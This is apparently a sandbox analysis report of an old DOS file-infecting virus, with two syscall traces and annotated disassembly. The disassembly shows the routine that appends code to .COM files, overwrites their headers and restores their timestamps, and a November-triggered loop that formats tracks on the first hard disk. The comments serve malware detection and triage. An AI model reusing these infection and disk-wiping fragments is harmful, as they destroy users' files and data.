{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.372036557Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.375851882Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.377685484Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.37897832Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.385774193Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.412274696Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.420122018Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.427884168Z 66 PC: 12bb4 | Move file pointer
; Disassembly window the sandbox attached to the INT 21h "Get time" event
; (syscall op 44 = AH 2Ch): the two writes that modify an opened .COM file.
; Get time returns seconds in DH and hundredths in DL; clearing DH leaves
; DX = hundredths (0..99).
; Indicators visible here for detection: the file grows by a variable amount
; (526 + 0..99 bytes), its first 4 bytes are overwritten, and the file
; date/time is written back afterwards (AX=5701h).
2018-12-25T12:54:09.430688606Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
; Length = 0x20E (526) + hundredths, so the appended size differs per file;
; the matching trace row reports 600 bytes. A check for exactly 526 bytes of
; growth would miss this.
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
; INT 21h AH=40h: write CX bytes from SI+0x104 at the current file position
; (the handle in BX and the preceding seek are set up outside this window).
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
; Call target is printed as 0x22b47 and is not shown on this page. JB tests
; the carry flag as it stands after the call returns; whether that still
; reflects the write's status depends on that routine.
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
; INT 21h AX=4200h with CX:DX = 0: seek to the start of the file.
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
; Write 4 bytes from SI+0x2DC over the start of the file (the trace shows a
; 4-byte read from the same handle earlier; presumably the saved original
; header -- confirm against code outside this window).
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
; INT 21h AX=5701h sets the file date/time; CX/DX are loaded after this
; window ends, presumably with the original stamp -- TODO confirm.
0x12beb: mov ax, 0x5701
2018-12-25T12:54:09.433247126Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.442478164Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.444505926Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.450444233Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.452457832Z 62 PC: 12bfc | Close file
2018-12-25T12:54:09.462274698Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.473519811Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.476903419Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.488829558Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.49638301Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.504107658Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.506098431Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.508941103Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.517971583Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.520075799Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.528095712Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.5298861Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.538932297Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.550839124Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.554455221Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.565934742Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.575231274Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.583220954Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.58518462Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.589056665Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.598442786Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.600556316Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.609201035Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.611467993Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.620558047Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.632279897Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.635627056Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.647296731Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.655428203Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.66304586Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.664660744Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.667121348Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.676612981Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.678156142Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.685390246Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.688460053Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.698469787Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.710226416Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.714484633Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.725886061Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.734124416Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.741942487Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.743821957Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.746336462Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.755524003Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.757980995Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.765420221Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.768035974Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.791896046Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.807100549Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.810164373Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.822148997Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.829813895Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.837431453Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.839643173Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.842464029Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.852811975Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.85487229Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.862764708Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.864776759Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.873801391Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.885988455Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.889466174Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.901148651Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.909624299Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.917390667Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.919280489Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.922504388Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.932012216Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.934087108Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.943646957Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.945837711Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.955014074Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.967758078Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.971504921Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.982859712Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.991907468Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.995624482Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.997831698Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.006044956Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.018416527Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.022441285Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:10.033301109Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:10.044705898Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.055849917Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.063657495Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.07245865Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.074858542Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.083099933Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.09545641Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.099127726Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.110905302Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.118712505Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.127270272Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.129351794Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.137676031Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.150340694Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.153723422Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.1737091Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.187503321Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.20470062Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.206757783Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.21588223Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.23208601Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.235371423Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.246801902Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.25570154Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.263404006Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.265472566Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.274731704Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.286586479Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.289828634Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.301749683Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.309927603Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.317361188Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.320174817Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.328762705Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.340005117Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.344030282Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.356270201Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.363774081Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.371016803Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.374022724Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.381990184Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.393542596Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.397970653Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.409707912Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.41758892Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.426123263Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.428201752Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.436441256Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.448614201Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.45222196Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.463361693Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.471921664Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.480703361Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.482390667Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.491183474Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.502986611Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.506117333Z 26 PC: 12af9 | Set disk transfer address
2018-12-25T12:54:10.507976996Z 59 PC: 12b03 | Change current directory
; Disassembly window attached to the INT 21h "Get date" event (syscall op
; 42 = AH 2Ah): date trigger, BIOS disk loop, message, return to the host.
; Get date returns the month in DH; 0x0B is November.
; NOTE(review): trace rows are emitted for INT 21h services only; the
; INT 13h calls in this window have no row, so the trace alone does not
; show whether the disk requests were issued or what they returned.
2018-12-25T12:54:10.511224515Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb
; Month != 11: skip the payload and go to the host hand-off.
0x12b0a: jne 0x12b2b
; Payload loop. INT 13h is called with AH=05h (BIOS "format track"),
; AL=0Dh, CH=cylinder, CL=1, DH=0 (head 0), DL=80h (first fixed disk).
; ES:BX is not set inside this window.
0x12b0c: mov ch, 0
0x12b0e: mov ax, 0x50d
0x12b11: mov cl, 1
0x12b13: mov dx, 0x80
0x12b16: int 0x13
; Cylinder counter runs 0..0Ch; the loop ends when CH reaches 0Dh (ZF set
; by the CMP makes LOOPNE fall through).
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e
; Helper at 0x12b64 is not shown on this page.
0x12b1f: call 0x12b64
; INT 21h AH=09h: print the '$'-terminated string at SI+0x2E0. The next
; trace row (PC 12b2b, the address after this INT) records the text shown.
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si
0x12b27: mov ah, 9
0x12b29: int 0x21
; RET to a pushed 0x100, the entry offset of a .COM image: control passes
; to the host program.
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret
; Separate path, not reached from the RET above: checks a flag byte at
; SI+0x2D7 and loops back to 0x12aec (target outside this view).
0x12b30: cmp byte ptr [si + 0x2d7], 1
0x12b35: je 0x12aec
2018-12-25T12:54:10.516239081Z 9 PC: 12b2b | Display string (String= 'Big brother is watching you. Virus Factory 93 ')
2018-12-25T12:54:10.524159668Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.409102427Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.415840063Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.417009864Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.418105731Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.424171921Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.440252691Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.446488346Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.452679187Z 66 PC: 12bb4 | Move file pointer
; Disassembly window attached to the INT 21h "Get time" event (syscall op
; 44 = AH 2Ch): append a variable-length block to the open file, then
; overwrite its first 4 bytes.
; After Get time, DL holds hundredths of a second; XOR DH,DH leaves
; DX = 0..99.
; For triage of a suspect .COM file: expect growth of 526..625 bytes, a
; changed 4-byte header, and a file date/time that is set again by the
; program (AX=5701h), so the timestamp is not a reliable change signal.
2018-12-25T12:54:09.453962474Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
; CX = 0x20E (526) + hundredths: the written length varies from file to
; file (600 bytes in the trace row that follows).
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
; INT 21h AH=40h: write CX bytes starting at SI+0x104. BX (handle) and the
; file position come from code before this window.
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
; The call target (printed as 0x22b47) is not on this page. The JB after it
; reads whatever carry state that routine leaves behind.
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
; INT 21h AX=4200h, CX:DX = 0: move the file pointer to offset 0.
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
; INT 21h AH=40h: write 4 bytes from SI+0x2DC at the start of the file.
; What those bytes encode is not visible here (presumably a jump to the
; appended block -- verify).
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
; Both error branches land here. AX=5701h selects "set file date/time"; the
; CX/DX values and the INT itself follow outside this window.
0x12beb: mov ax, 0x5701
2018-12-25T12:54:09.4558377Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.463263328Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.46449687Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.470543997Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.471808832Z 62 PC: 12bfc | Close file
2018-12-25T12:54:09.479126844Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.4864985Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.488897462Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.498909368Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.505150211Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.511279511Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.513543261Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.515527313Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.523164369Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.52503332Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.531915173Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.533403796Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.541765501Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.551975333Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.554485168Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.565008749Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.571397916Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.578548152Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.580367086Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.582484968Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.590380226Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.592067997Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.598303408Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.599616721Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.607362802Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.61732468Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.620182515Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.628716329Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.634339165Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.639772647Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.641238981Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.64360531Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.650664838Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.652193721Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.65829945Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.659480217Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.666057113Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.675604036Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.677858066Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.686560736Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.69223901Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.69767677Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.698829351Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.70085774Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.707696154Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.709195337Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.71492913Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.716179641Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.722977556Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.732130678Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.734368352Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.743027425Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.754134908Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.759950012Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.762131463Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.765133913Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.773022871Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.77435852Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.781521562Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.783206669Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.790149916Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.79934434Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.80156729Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.809886281Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.816564897Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.822099213Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.823453178Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.825688294Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.832548887Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.83369842Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.840376725Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.841709931Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.848379805Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.858152391Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.860717682Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.870359096Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.877597474Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.884183176Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.885801669Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.892969888Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.903175304Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.905386896Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:09.910088772Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:09.916139367Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.928026931Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.939073913Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.945323903Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.946771314Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.954226895Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.963767129Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.966230296Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.975944986Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.982347969Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.988860056Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.990663874Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.999728976Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.012009779Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.014670703Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.027150939Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.032934507Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.038888527Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.040183453Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.046299323Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.055157518Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.057491681Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.068402826Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.075151692Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.081003951Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.08280094Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.090401141Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.100574648Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.103455946Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.113983074Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.12577618Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.132490953Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.134189599Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.141633181Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.15117596Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.153538966Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.163111259Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.169386969Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.175452675Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.176956248Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.185748784Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.197843976Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.200904181Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.210125775Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.216396769Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.222562427Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.223874157Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.230791486Z 67 PC: 12c0c | Get or set file attributes (See above)
